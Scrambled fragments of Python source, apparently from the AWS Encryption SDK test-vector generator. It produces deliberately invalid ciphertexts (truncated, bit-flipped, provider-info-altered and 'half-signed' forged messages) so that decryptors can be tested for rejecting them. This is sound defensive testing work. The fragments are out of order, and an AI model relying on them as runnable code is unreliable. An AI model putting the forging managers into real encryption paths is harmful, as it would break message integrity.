caching_cmm, new_provider_info ) for new_provider_info in", "unsigned algorithm suite that includes the \"aws-crypto-public-key\" encryption context. THIS", "-> None \"\"\"Process all known encrypt test scenarios and write", "Callable decryption_master_key_provider_fn: :param result: \"\"\" encryption_scenario = attr.ib(validator=attr.validators.instance_of(MessageEncryptionTestScenario)) tampering_method =", "Iterable of master key specifications :type decryption_master_key_specs: iterable of :class:`MasterKeySpec`", "result) pairs. \"\"\" ciphertext_to_decrypt = generation_scenario.encryption_scenario.run() return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer,", "{name: plaintext_writer(name, plaintext) for name, plaintext in self.plaintexts.items()} ciphertext_writer =", "plaintext values :param dict tests: Mapping of test scenario names", "wrapped default CMM\"\"\" return self.wrapped_default_cmm.decrypt_materials(request) @attr.s class MessageDecryptionTestScenarioGenerator(object): # pylint:", "scenario that describes the generated scenario :rtype: MessageDecryptionTestScenario \"\"\" return", "ProviderInfoChangingCryptoMaterialsManager(materials_manager, new_provider_info) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result = MessageDecryptionTestResult.expect_error( \"Incorrect encrypted", "ciphertext_writer, plaintext_uris[scenario.encryption_scenario.plaintext_name] ).items() } decrypt_manifest = MessageDecryptionManifest( keys_uri=\"file://keys.json\", keys=self.keys, test_scenarios=test_scenarios", "disable=too-many-instance-attributes \"\"\"Data class for a single full message decrypt test", "awses_test_vectors.internal.defaults import ENCODING from awses_test_vectors.internal.util import ( dictionary_validator, file_reader, file_writer,", "Described in AWS Crypto Tools Test Vector Framework feature #0006", "DefaultCryptoMaterialsManager from awses_test_vectors.internal.defaults import ENCODING from awses_test_vectors.internal.util import ( dictionary_validator,", ") def run(self, ciphertext_writer, plaintext_uri): \"\"\"Run this scenario, writing the", "= generation_scenario.result else: expected_result = MessageDecryptionTestResult.expect_output( plaintext_uri=plaintext_uri, plaintext=generation_scenario.encryption_scenario.plaintext ) return", "given new provider info value.\"\"\" self.new_provider_infos = new_provider_infos @classmethod def", "ImportError: # pragma: no cover # We only actually need", ") return [ self.run_scenario_with_new_provider_info( ciphertext_writer, generation_scenario, caching_cmm, new_provider_info ) for", "for ESDKs to reject. \"\"\" wrapped_default_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) def __init__(self,", "attr.ib(validator=dictionary_validator(six.string_types, six.binary_type)) tests = attr.ib(validator=dictionary_validator(six.string_types, MessageDecryptionTestScenarioGenerator)) type_name = \"awses-decrypt-generate\" @staticmethod", "raise ValueError(\"Unrecognized tampering method tag: \" + tampering_tag) # pylint:", "for an unsigned algorithm suite that includes the \"aws-crypto-public-key\" encryption", "None return cls( encryption_scenario=encryption_scenario, tampering_method=tampering_method, decryption_method=decryption_method, decryption_master_key_specs=decryption_master_key_specs, decryption_master_key_provider_fn=decryption_master_key_provider_fn, result=result, )", "\"AES_256_GCM_HKDF_SHA512_COMMIT_KEY algorithm suite.\" ) def decrypt_materials(self, request): \"\"\"Thunks to the", "bit flipped, for every possible bit.\"\"\" # pylint: disable=R0201 def", "= cls._generate_plaintexts(raw_manifest[\"plaintexts\"]) tests = {} for name, scenario in raw_manifest[\"tests\"].items():", "def decryption_test_scenario_pair(self, ciphertext_writer, ciphertext_to_decrypt, expected_result): \"\"\"Create a new (name, decryption", "that wraps a the given CMM.\"\"\" self.wrapped_cmm = materials_manager self.new_provider_info", "from a decrypted signed message, and therefore this is an", "return: a list of (ciphertext, result) pairs. \"\"\" master_key_provider =", "ciphertext_to_decrypt, expected_result): \"\"\"Create a new (name, decryption scenario) pair\"\"\" ciphertext_name", "uuid from copy import copy import attr import six from", "import AlgorithmSuite except ImportError: from aws_encryption_sdk.identifiers import Algorithm as AlgorithmSuite", "MessageDecryptionTestResult.from_result_spec(result_spec, None) if result_spec else None return cls( encryption_scenario=encryption_scenario, tampering_method=tampering_method,", "ciphertext_writer, ciphertext_to_decrypt, expected_result ) class ProviderInfoChangingCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM that", "from the wrapped default CMM, and then changing the algorithm", "a new DefaultCryptoMaterialsManager based on the given master key provider.", ") return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ] class HalfSigningCryptoMaterialsManager(CryptoMaterialsManager): \"\"\"", "for name, scenario in raw_manifest[\"tests\"].items(): try: tests[name] = MessageDecryptionTestScenarioGenerator.from_scenario( scenario=scenario,", "ciphertext_writer, ciphertext_to_decrypt[0:length], MessageDecryptionTestResult.expect_error(\"Truncated at byte {}\".format(length)), ) for length in", "= generation_scenario.encryption_scenario.run(materials_manager) if generation_scenario.result: expected_result = generation_scenario.result else: expected_result =", "aws_encryption_sdk.identifiers import Algorithm as AlgorithmSuite from awses_test_vectors.manifests.master_key import MasterKeySpec, master_key_provider_from_master_key_specs", "decrypt_scenario for name, scenario in self.tests.items() for decrypt_scenario_name, decrypt_scenario in", "\"License\"). You # may not use this file except in", ":class:`MessageDecryptionGenerationManifest`s \"\"\" version = attr.ib(validator=membership_validator(SUPPORTED_VERSIONS)) keys = attr.ib(validator=attr.validators.instance_of(KeysManifest)) plaintexts =", "tests[name] = MessageDecryptionTestScenarioGenerator.from_scenario( scenario=scenario, keys=keys, plaintexts=plaintexts ) except NotImplementedError: continue", "or its affiliates. All Rights Reserved. # # Licensed under", "from manifest specs. :param MessageEncryptionTestScenario encryption_scenario: Encryption parameters :param tampering_method:", "to the wrapped CMM\"\"\" return self.wrapped_cmm.decrypt_materials(request) BITS_PER_BYTE = 8 class", "decryption_master_key_specs) else: decryption_master_key_specs = encryption_scenario.master_key_specs decryption_master_key_provider_fn = encryption_scenario.master_key_provider_fn result_spec =", "try: tests[name] = MessageDecryptionTestScenarioGenerator.from_scenario( scenario=scenario, keys=keys, plaintexts=plaintexts ) except NotImplementedError:", "new instance for a given new provider info value.\"\"\" self.new_provider_infos", "a :class:`MessageDecryptionTestScenario` that describes the matching decrypt scenario. :param callable", "CMM to avoid generating a new data key every time.", "is an important case for ESDKs to reject. \"\"\" wrapped_default_cmm", "the result. return: a list of (ciphertext, result) pairs \"\"\"", "plaintexts: Mapping of plaintext names to plaintext values :return: Loaded", "KIND, either express or implied. See the License for the", "MESSAGES and should never be used in production! \"\"\" wrapped_cmm", "# pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri): \"\"\" Run", "plaintexts) tampering = scenario.get(\"tampering\") tampering_method = TamperingMethod.from_tampering_spec(tampering) decryption_method_spec = scenario.get(\"decryption-method\")", "ciphertext_to_decrypt) return ( ciphertext_name, MessageDecryptionTestScenario( ciphertext_uri=ciphertext_uri, ciphertext=ciphertext_to_decrypt, master_key_specs=self.decryption_master_key_specs, master_key_provider_fn=self.decryption_master_key_provider_fn, decryption_method=self.decryption_method,", "MessageDecryptionGenerationManifest(object): \"\"\"AWS Encryption SDK Decryption Message Generation manifest handler. Described", "generation_scenario.encryption_scenario.run() return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, TruncateTamperingMethod.flip_bit(ciphertext_to_decrypt, bit), MessageDecryptionTestResult.expect_error(\"Bit {} flipped\".format(bit)),", "single full message decrypt test scenario. Handles serialization and deserialization", "on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF", "data key every time. cache = LocalCryptoMaterialsCache(10) caching_cmm = CachingCryptoMaterialsManager(", "modules from typing import IO, Callable, Dict, Iterable, Optional #", "attr.ib(validator=attr.validators.optional(attr.validators.instance_of(MessageDecryptionTestResult))) @classmethod def from_scenario(cls, scenario, keys, plaintexts): \"\"\"Load from a", "Apache License, Version 2.0 (the \"License\"). You # may not", "self.tests.items() for decrypt_scenario_name, decrypt_scenario in scenario.run( ciphertext_writer, plaintext_uris[scenario.encryption_scenario.plaintext_name] ).items() }", "SDK Decrypt Message Generation manifest handler. Described in AWS Crypto", "from_values_spec(cls, values_spec): \"\"\"Load from a tampering parameters specification\"\"\" return ChangeEDKProviderInfoTamperingMethod(values_spec)", "ProviderInfoChangingCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM that modifies the provider info field", "copy import attr import six from aws_encryption_sdk.caches.local import LocalCryptoMaterialsCache from", "ciphertext\"\"\" byte_index, bit_index = divmod(bit, BITS_PER_BYTE) result = bytearray(ciphertext) result[byte_index]", "use this file except in compliance with the License. A", "file input_file: File object for file containing JSON manifest :return:", ") return generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt, expected_result ) class ProviderInfoChangingCryptoMaterialsManager(CryptoMaterialsManager): \"\"\"", "return dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer, self, plaintext_uri)) def decryption_test_scenario_pair(self, ciphertext_writer, ciphertext_to_decrypt, expected_result): \"\"\"Create", "new data key every time. cache = LocalCryptoMaterialsCache(10) caching_cmm =", "http://aws.amazon.com/apache2.0/ # # or in the \"license\" file accompanying this", ") return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ] class ChangeEDKProviderInfoTamperingMethod(TamperingMethod): \"\"\"Tampering", "master_key_provider_from_master_key_specs try: # Python 3.5.0 and 3.5.1 have incompatible typing", "the provider info on all EDKs.\"\"\" new_provider_infos = attr.ib(validator=iterable_validator(list, six.string_types))", "AlgorithmSuite from awses_test_vectors.manifests.master_key import MasterKeySpec, master_key_provider_from_master_key_specs try: # Python 3.5.0", "this file. This file is # distributed on an \"AS", "a new (name, decryption scenario) pair\"\"\" ciphertext_name = str(uuid.uuid4()) ciphertext_uri", "only the given bit in the given ciphertext\"\"\" byte_index, bit_index", "tampering with the input or the result. return: a list", "return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, TruncateTamperingMethod.flip_bit(ciphertext_to_decrypt, bit), MessageDecryptionTestResult.expect_error(\"Bit {} flipped\".format(bit)), )", "attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) new_provider_info = attr.ib(validator=attr.validators.instance_of(six.string_types)) def __init__(self, materials_manager, new_provider_info): \"\"\"Create a", "with a public key\" ) return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result)", "signing_request.algorithm = AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY_ECDSA_P384 result = self.wrapped_default_cmm.get_encryption_materials(signing_request) result.algorithm = request.algorithm result.signing_key", "LocalCryptoMaterialsCache from aws_encryption_sdk.materials_managers.base import CryptoMaterialsManager from aws_encryption_sdk.materials_managers.caching import CachingCryptoMaterialsManager from", "a list of (ciphertext, result) pairs \"\"\" materials_manager = DefaultCryptoMaterialsManager(", "class HalfSigningCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM that generates materials for an", "plaintext_uri): \"\"\" Run a given scenario, tampering with the input", "CMM that generates materials for an unsigned algorithm suite that", "CMM\"\"\" return self.wrapped_cmm.decrypt_materials(request) BITS_PER_BYTE = 8 class TruncateTamperingMethod(TamperingMethod): \"\"\"Tampering method", ":return: Loaded test scenario :rtype: MessageDecryptionTestScenarioGenerator \"\"\" encryption_scenario_spec = scenario[\"encryption-scenario\"]", "NotImplementedError( \"The half-sign tampering method is only supported on the", "MessageDecryptionTestScenario \"\"\" return dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer, self, plaintext_uri)) def decryption_test_scenario_pair(self, ciphertext_writer, ciphertext_to_decrypt,", "from a tampering parameters specification\"\"\" return ChangeEDKProviderInfoTamperingMethod(values_spec) # pylint: disable=R0201", "run_and_write_to_dir(self, target_directory, json_indent=None): # type: (str, Optional[int]) -> None \"\"\"Process", "DecryptionMethod, MessageDecryptionManifest, MessageDecryptionTestResult, MessageDecryptionTestScenario, ) from awses_test_vectors.manifests.full_message.encrypt import MessageEncryptionTestScenario from", "tampering_materials_manager = HalfSigningCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result =", "of (ciphertext, result) pairs. \"\"\" ciphertext_to_decrypt = generation_scenario.encryption_scenario.run() return [", "materials from the wrapped CMM, and then change the provider", "import os import uuid from copy import copy import attr", "cache=cache, max_age=60.0, max_messages_encrypted=100, ) return [ self.run_scenario_with_new_provider_info( ciphertext_writer, generation_scenario, caching_cmm,", "encrypt manifest. :param file input_file: File object for file containing", "Dict, Iterable, Optional # noqa pylint: disable=unused-import from awses_test_vectors.internal.mypy_types import", "ciphertext_writer, generation_scenario, _plaintext_uri): \"\"\" Run a given scenario, tampering with", "Rights Reserved. # # Licensed under the Apache License, Version", "the provider info on each EDK. \"\"\" result = self.wrapped_cmm.get_encryption_materials(request)", "either express or implied. See the License for the specific", "= attr.ib(validator=attr.validators.optional(attr.validators.instance_of(DecryptionMethod))) decryption_master_key_specs = attr.ib(validator=iterable_validator(list, MasterKeySpec)) decryption_master_key_provider_fn = attr.ib(validator=attr.validators.is_callable()) result", "import CachingCryptoMaterialsManager from aws_encryption_sdk.materials_managers.default import DefaultCryptoMaterialsManager from awses_test_vectors.internal.defaults import ENCODING", "in scenario.run( ciphertext_writer, plaintext_uris[scenario.encryption_scenario.plaintext_name] ).items() } decrypt_manifest = MessageDecryptionManifest( keys_uri=\"file://keys.json\",", ":type decryption_master_key_specs: iterable of :class:`MasterKeySpec` :param Callable decryption_master_key_provider_fn: :param result:", "\"\"\" if request.algorithm == AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY: signing_request = copy(request) signing_request.algorithm =", "and manifests to disk. :param str target_directory: Directory in which", "= attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) def __init__(self, master_key_provider): \"\"\" Create a new CMM", "and 3.5.1 have incompatible typing modules from typing import IO,", "\"license\" file accompanying this file. This file is # distributed", "new CMM that wraps a new DefaultCryptoMaterialsManager based on the", ":class:`TamperingMethod` :param decryption_method: :param decryption_master_key_specs: Iterable of master key specifications", "return TamperingMethod() if spec == \"truncate\": return TruncateTamperingMethod() if spec", "Crypto Tools Test Vector Framework feature #0006 AWS Encryption SDK", "plaintext name to size in bytes :return: Mapping of plaintext", "= self.new_provider_info return result def decrypt_materials(self, request): \"\"\"Thunks to the", "provider info value.\"\"\" self.new_provider_infos = new_provider_infos @classmethod def from_values_spec(cls, values_spec):", "ciphertext :type tampering_method: :class:`TamperingMethod` :param decryption_method: :param decryption_master_key_specs: Iterable of", "def __init__(self, new_provider_infos): \"\"\"Create a new instance for a given", "] class HalfSigningTamperingMethod(TamperingMethod): \"\"\"Tampering method that changes the provider info", "encryption_scenario_spec = scenario[\"encryption-scenario\"] encryption_scenario = MessageEncryptionTestScenario.from_scenario(encryption_scenario_spec, keys, plaintexts) tampering =", "tampering parameters specification\"\"\" return ChangeEDKProviderInfoTamperingMethod(values_spec) # pylint: disable=R0201 def run_scenario_with_tampering(self,", "- 1) return bytes(result) class MutateTamperingMethod(TamperingMethod): \"\"\"Tampering method that produces", "to avoid generating a new data key every time. cache", "\"\"\" wrapped_default_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) def __init__(self, master_key_provider): \"\"\" Create a", "plaintext name to randomly generated bytes :rtype: dict \"\"\" return", "of (ciphertext, result) pairs. \"\"\" tampering_materials_manager = HalfSigningCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() )", "imports when running the mypy checks pass SUPPORTED_VERSIONS = (2,)", "\"\"\"Create a new CMM that wraps a the given CMM.\"\"\"", "Licensed under the Apache License, Version 2.0 (the \"License\"). You", "resulting data and manifests to disk. :param str target_directory: Directory", "from aws_encryption_sdk.identifiers import AlgorithmSuite except ImportError: from aws_encryption_sdk.identifiers import Algorithm", "membership_validator, validate_manifest_type, ) from awses_test_vectors.manifests.full_message.decrypt import ( DecryptionMethod, MessageDecryptionManifest, MessageDecryptionTestResult,", "to the wrapped default CMM\"\"\" return self.wrapped_default_cmm.decrypt_materials(request) @attr.s class MessageDecryptionTestScenarioGenerator(object):", "Loaded keys :param dict plaintexts: Mapping of plaintext names to", "all EDKs.\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):", "of # the License is located at # # http://aws.amazon.com/apache2.0/", "reader = file_reader(parent_dir) raw_keys_manifest = json.loads(reader(raw_manifest[\"keys\"]).decode(ENCODING)) keys = KeysManifest.from_manifest_spec(raw_keys_manifest) plaintexts", "= attr.ib(validator=dictionary_validator(six.string_types, MessageDecryptionTestScenarioGenerator)) type_name = \"awses-decrypt-generate\" @staticmethod def _generate_plaintexts(plaintexts_specs): #", "info on each EDK. \"\"\" result = self.wrapped_cmm.get_encryption_materials(request) for encrypted_data_key", "decrypt_scenario_name: decrypt_scenario for name, scenario in self.tests.items() for decrypt_scenario_name, decrypt_scenario", "this is an important case for ESDKs to reject. \"\"\"", "return self.wrapped_cmm.decrypt_materials(request) BITS_PER_BYTE = 8 class TruncateTamperingMethod(TamperingMethod): \"\"\"Tampering method that", "import ( DecryptionMethod, MessageDecryptionManifest, MessageDecryptionTestResult, MessageDecryptionTestScenario, ) from awses_test_vectors.manifests.full_message.encrypt import", "pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri): \"\"\" Run a", "HalfSigningTamperingMethod(TamperingMethod): \"\"\"Tampering method that changes the provider info on all", "decryption_master_key_provider_fn=decryption_master_key_provider_fn, result=result, ) def run(self, ciphertext_writer, plaintext_uri): \"\"\"Run this scenario,", "MasterKeySpec.from_scenario(spec) for spec in scenario[\"decryption-master-keys\"] ] def decryption_master_key_provider_fn(): return master_key_provider_from_master_key_specs(keys,", "plaintext_uris[scenario.encryption_scenario.plaintext_name] ).items() } decrypt_manifest = MessageDecryptionManifest( keys_uri=\"file://keys.json\", keys=self.keys, test_scenarios=test_scenarios )", "each EDK. \"\"\" result = self.wrapped_cmm.get_encryption_materials(request) for encrypted_data_key in result.encrypted_data_keys:", "values :param dict tests: Mapping of test scenario names to", "the given master key provider. \"\"\" self.wrapped_default_cmm = DefaultCryptoMaterialsManager(master_key_provider) def", "expected_result = MessageDecryptionTestResult.expect_error( \"Incorrect encrypted data key provider info: \"", "] class ChangeEDKProviderInfoTamperingMethod(TamperingMethod): \"\"\"Tampering method that changes the provider info", "import LocalCryptoMaterialsCache from aws_encryption_sdk.materials_managers.base import CryptoMaterialsManager from aws_encryption_sdk.materials_managers.caching import CachingCryptoMaterialsManager", "default CMM, and then changing the algorithm suite and removing", "@classmethod def flip_bit(cls, ciphertext, bit): \"\"\"Flip only the given bit", "def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, plaintext_uri): \"\"\" Run a given scenario,", "malicious decryptor without encryption permissions might do, to attempt to", "value.\"\"\" self.new_provider_infos = new_provider_infos @classmethod def from_values_spec(cls, values_spec): \"\"\"Load from", "and return a URI locating the written data :param str", "awses_test_vectors.internal.util import ( dictionary_validator, file_reader, file_writer, iterable_validator, membership_validator, validate_manifest_type, )", "# Python 3.5.0 and 3.5.1 have incompatible typing modules from", ":param KeysManifest keys: Loaded keys :param dict plaintexts: Mapping of", "test scenario :rtype: MessageDecryptionTestScenarioGenerator \"\"\" encryption_scenario_spec = scenario[\"encryption-scenario\"] encryption_scenario =", "root_writer = file_writer(root_dir) root_writer(\"keys.json\", json.dumps(self.keys.manifest_spec, indent=json_indent).encode(ENCODING)) plaintext_writer = file_writer(os.path.join(root_dir, \"plaintexts\"))", "import json import os import uuid from copy import copy", "Python 3.5.0 and 3.5.1 have incompatible typing modules from typing", "import uuid from copy import copy import attr import six", "attr.ib(validator=attr.validators.is_callable()) result = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(MessageDecryptionTestResult))) @classmethod def from_scenario(cls, scenario, keys, plaintexts):", "[ MasterKeySpec.from_scenario(spec) for spec in scenario[\"decryption-master-keys\"] ] def decryption_master_key_provider_fn(): return", "MessageDecryptionTestResult.expect_error( \"Unsigned message using a data key with a public", "generation_scenario.decryption_test_scenario_pair( ciphertext_writer, TruncateTamperingMethod.flip_bit(ciphertext_to_decrypt, bit), MessageDecryptionTestResult.expect_error(\"Bit {} flipped\".format(bit)), ) for bit", "new_provider_info def get_encryption_materials(self, request): \"\"\" Request materials from the wrapped", "return self.wrapped_default_cmm.decrypt_materials(request) @attr.s class MessageDecryptionTestScenarioGenerator(object): # pylint: disable=too-many-instance-attributes \"\"\"Data class", "case for ESDKs to reject. \"\"\" wrapped_default_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) def", "= scenario.get(\"decryption-method\") decryption_method = DecryptionMethod(decryption_method_spec) if decryption_method_spec else None if", "aws_encryption_sdk.caches.local import LocalCryptoMaterialsCache from aws_encryption_sdk.materials_managers.base import CryptoMaterialsManager from aws_encryption_sdk.materials_managers.caching import", "pylint: disable=unused-import ENCRYPT_SCENARIO_SPEC, PLAINTEXTS_SPEC, ) except ImportError: # pragma: no", "the License. \"\"\" AWS Encryption SDK Decrypt Message Generation manifest", "in AWS Crypto Tools Test Vector Framework feature #0006 AWS", "new CMM that wraps a the given CMM.\"\"\" self.wrapped_cmm =", "a scenario specification. :param dict scenario: Scenario specification JSON :param", "result = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(MessageDecryptionTestResult))) @classmethod def from_scenario(cls, scenario, keys, plaintexts): \"\"\"Load", "a file containing a full message encrypt manifest. :param file", "the generated scenario :rtype: MessageDecryptionTestScenario \"\"\" return dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer, self, plaintext_uri))", "See the License for the specific # language governing permissions", "expected_result) ] class HalfSigningCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM that generates materials", "- bit_index - 1) return bytes(result) class MutateTamperingMethod(TamperingMethod): \"\"\"Tampering method", "a data key with a public key\" ) return [", "\"\"\" Create a new CMM that wraps a new DefaultCryptoMaterialsManager", "def _generate_plaintexts(plaintexts_specs): # type: (PLAINTEXTS_SPEC) -> Dict[str, bytes] \"\"\"Generate required", "for all tampering methods.\"\"\" @classmethod def from_tampering_spec(cls, spec): \"\"\"Load from", "parameters specification\"\"\" return ChangeEDKProviderInfoTamperingMethod(values_spec) # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer,", "[ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ] class ChangeEDKProviderInfoTamperingMethod(TamperingMethod): \"\"\"Tampering method that", "info: \" + new_provider_info ) return generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt, expected_result", "\"\"\" AWS Encryption SDK Decrypt Message Generation manifest handler. Described", "dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer, self, plaintext_uri)) def decryption_test_scenario_pair(self, ciphertext_writer, ciphertext_to_decrypt, expected_result): \"\"\"Create a", "from aws_encryption_sdk.caches.local import LocalCryptoMaterialsCache from aws_encryption_sdk.materials_managers.base import CryptoMaterialsManager from aws_encryption_sdk.materials_managers.caching", "Loaded manifest :rtype: MessageEncryptionManifest \"\"\" raw_manifest = json.load(input_file) validate_manifest_type( type_name=cls.type_name,", "scenario :rtype: MessageDecryptionTestScenarioGenerator \"\"\" encryption_scenario_spec = scenario[\"encryption-scenario\"] encryption_scenario = MessageEncryptionTestScenario.from_scenario(encryption_scenario_spec,", "= os.path.abspath(os.path.dirname(input_file.name)) reader = file_reader(parent_dir) raw_keys_manifest = json.loads(reader(raw_manifest[\"keys\"]).decode(ENCODING)) keys =", "run_scenario_with_new_provider_info( self, ciphertext_writer, generation_scenario, materials_manager, new_provider_info ): \"\"\"Run with tampering", "return a URI locating the written data :param str plaintext_uri:", "ValueError(\"Unrecognized tampering method tag: \" + tampering_tag) # pylint: disable=R0201", "+ new_provider_info ) return generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt, expected_result ) class", "file containing JSON manifest :return: Loaded manifest :rtype: MessageEncryptionManifest \"\"\"", "plaintexts_specs.items()} @classmethod def from_file(cls, input_file): # type: (IO) -> MessageDecryptionGenerationManifest", "#0006 AWS Encryption SDK Decrypt Message Generation. :param int version:", "scenario in self.tests.items() for decrypt_scenario_name, decrypt_scenario in scenario.run( ciphertext_writer, plaintext_uris[scenario.encryption_scenario.plaintext_name]", "AlgorithmSuite except ImportError: from aws_encryption_sdk.identifiers import Algorithm as AlgorithmSuite from", "new DefaultCryptoMaterialsManager based on the given master key provider. \"\"\"", "of plaintext names to plaintext values :param dict tests: Mapping", "\"aws-crypto-public-key\" encryption context. THIS IS ONLY USED TO CREATE INVALID", "= divmod(bit, BITS_PER_BYTE) result = bytearray(ciphertext) result[byte_index] ^= 1 <<", "ciphertext=ciphertext_to_decrypt, master_key_specs=self.decryption_master_key_specs, master_key_provider_fn=self.decryption_master_key_provider_fn, decryption_method=self.decryption_method, result=expected_result, ), ) @attr.s class MessageDecryptionGenerationManifest(object):", "= MessageEncryptionTestScenario.from_scenario(encryption_scenario_spec, keys, plaintexts) tampering = scenario.get(\"tampering\") tampering_method = TamperingMethod.from_tampering_spec(tampering)", "express or implied. See the License for the specific #", "expected_result = MessageDecryptionTestResult.expect_output( plaintext_uri=plaintext_uri, plaintext=generation_scenario.encryption_scenario.plaintext ) return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt,", "used in production! It is imitating what a malicious decryptor", ":param Callable decryption_master_key_provider_fn: :param result: \"\"\" encryption_scenario = attr.ib(validator=attr.validators.instance_of(MessageEncryptionTestScenario)) tampering_method", "class TamperingMethod: \"\"\"Base class for all tampering methods.\"\"\" @classmethod def", "wraps a the given CMM.\"\"\" self.wrapped_cmm = materials_manager self.new_provider_info =", "= json.load(input_file) validate_manifest_type( type_name=cls.type_name, manifest_version=raw_manifest[\"manifest\"], supported_versions=SUPPORTED_VERSIONS ) parent_dir = os.path.abspath(os.path.dirname(input_file.name))", "method that truncates a good message at every byte (except", "JSON manifest :return: Loaded manifest :rtype: MessageEncryptionManifest \"\"\" raw_manifest =", "os.urandom(size) for name, size in plaintexts_specs.items()} @classmethod def from_file(cls, input_file):", "= file_writer(os.path.join(root_dir, \"ciphertexts\")) test_scenarios = { decrypt_scenario_name: decrypt_scenario for name,", "attr import six from aws_encryption_sdk.caches.local import LocalCryptoMaterialsCache from aws_encryption_sdk.materials_managers.base import", "request.algorithm == AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY: signing_request = copy(request) signing_request.algorithm = AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY_ECDSA_P384 result", "forge an unsigned message from a decrypted signed message, and", "pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, plaintext_uri): \"\"\" Run a", "= MessageDecryptionTestResult.expect_error( \"Incorrect encrypted data key provider info: \" +", "Encryption SDK Decryption Message Generation manifest handler. Described in AWS", "request.algorithm result.signing_key = None return result raise NotImplementedError( \"The half-sign", "these imports when running the mypy checks pass SUPPORTED_VERSIONS =", "bit): \"\"\"Flip only the given bit in the given ciphertext\"\"\"", "BITS_PER_BYTE) ] @classmethod def flip_bit(cls, ciphertext, bit): \"\"\"Flip only the", "\"\"\" tampering_materials_manager = HalfSigningCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result", "-> Dict[str, bytes] \"\"\"Generate required plaintext values. :param dict plaintexts_specs:", ":class:`MessageDecryptionTestScenario` that describes the matching decrypt scenario. :param callable ciphertext_writer:", "located at # # http://aws.amazon.com/apache2.0/ # # or in the", "= new_provider_info def get_encryption_materials(self, request): \"\"\" Request materials from the", "a URI locating the written data :param str plaintext_uri: URI", "the result. return: a list of (ciphertext, result) pairs. \"\"\"", "Number of spaces to indent JSON files (optional: default is", "MessageDecryptionTestResult.expect_output( plaintext_uri=plaintext_uri, plaintext=generation_scenario.encryption_scenario.plaintext ) return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ]", "checks pass SUPPORTED_VERSIONS = (2,) class TamperingMethod: \"\"\"Base class for", "DecryptionMethod(decryption_method_spec) if decryption_method_spec else None if \"decryption-master-keys\" in scenario: decryption_master_key_specs", "decryption_master_key_provider_fn: :param result: \"\"\" encryption_scenario = attr.ib(validator=attr.validators.instance_of(MessageEncryptionTestScenario)) tampering_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(TamperingMethod)))", "{}\".format(length)), ) for length in range(1, len(ciphertext_to_decrypt)) ] class HalfSigningTamperingMethod(TamperingMethod):", "in the given ciphertext\"\"\" byte_index, bit_index = divmod(bit, BITS_PER_BYTE) result", "should never be used in production! It is imitating what", "MessageDecryptionTestResult.expect_error(\"Bit {} flipped\".format(bit)), ) for bit in range(0, len(ciphertext_to_decrypt) *", "with tampering for a specific new provider info value\"\"\" tampering_materials_manager", "a given scenario, tampering with the input or the result.", "decryption_method_spec else None if \"decryption-master-keys\" in scenario: decryption_master_key_specs = [", "the given ciphertext\"\"\" byte_index, bit_index = divmod(bit, BITS_PER_BYTE) result =", "= \"awses-decrypt-generate\" @staticmethod def _generate_plaintexts(plaintexts_specs): # type: (PLAINTEXTS_SPEC) -> Dict[str,", "MasterKeySpec, master_key_provider_from_master_key_specs try: # Python 3.5.0 and 3.5.1 have incompatible", "an important case for ESDKs to reject. \"\"\" wrapped_default_cmm =", "noqa pylint: disable=unused-import ENCRYPT_SCENARIO_SPEC, PLAINTEXTS_SPEC, ) except ImportError: # pragma:", "decryption_master_key_specs = attr.ib(validator=iterable_validator(list, MasterKeySpec)) decryption_master_key_provider_fn = attr.ib(validator=attr.validators.is_callable()) result = 